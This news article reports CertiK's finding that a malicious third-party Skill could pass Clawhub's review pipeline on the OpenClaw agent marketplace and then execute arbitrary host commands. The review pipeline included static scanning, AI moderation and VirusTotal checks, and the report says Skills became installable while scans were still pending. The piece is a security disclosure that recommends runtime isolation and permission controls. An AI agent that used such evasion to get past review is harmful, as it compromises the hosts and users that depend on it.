The researchers from CertiK , a renowned blockchain security entity, have recently uncovered a crucial security lapse in the latest AI agent networks. Hence, the new report from CertiK’s lead researcher, Guanxing Wen, warns against the insufficiency of just skill scanning when it comes to ensuring safety.
As CertiK mentioned in its official press release, a legitimate 3rd-party “Skill” could circumvent moderation checks on the OpenClaw platform. The malicious Skill was even capable of executing arbitrary commands via the host system, irrespective of passing diverse review layers.
CertiK Uncovers Deficiency of AI Skill Detection and Review System in Securing AI Agent Marketplaces
As CertiK’s analysis discloses, Clawhub, the AI agent marketplace of OpenClaw, depends on a multi-layered pipeline of reviews, including unchangeable code scanning, AI-led moderation, and VirusTotal checks. Though these mechanisms focus on identifying malicious behavior, CertiK’s researchers found that prudently structured logic and minute code modifications can conveniently circumvent detection.
In several cases, Skills that seem benign during the process of installation may contain manipulable vulnerabilities concealed within normal workflows.The research stresses the inherent limitation of static detection methods.
Just like conventional cybersecurity tools such as web app firewalls or antivirus software, pattern-based identification can be circumvented via minor code structure variations. Additionally, while artificial intelligence (AI) moderation enhances detection with the analysis of inconsistencies and intent, it is still deficient at unearthing deeply integrated vulnerabilities.
Blockchain Security Platform Recommends Runtime-Based Security and Resilient Skill Isolation
According to CertiK, its proof-of-concept has further disclosed a flaw in the handling of pending security audits. Specifically, Skills could reportedly become openly installable and available even at a time when VirusTotal results appear incomplete.
Keeping this in view, CertiK’s study encourages the enhancement of detection rather than relying on user warnings and marketplace reviews. As a result, without solid runtime protection, even a single overlooked vulnerability can result in compromise of the whole host environment.
Amid the wider growth of AI ecosystems, CertiK pushes toward the adoption of runtime-based security frameworks, enhanced 3rd-party Skills isolation, and stringent permission controls. So, comprehensive security will rely on establishing mechanisms that assume some threats to bypass review to ensure the containment of such threats ahead of any harm.


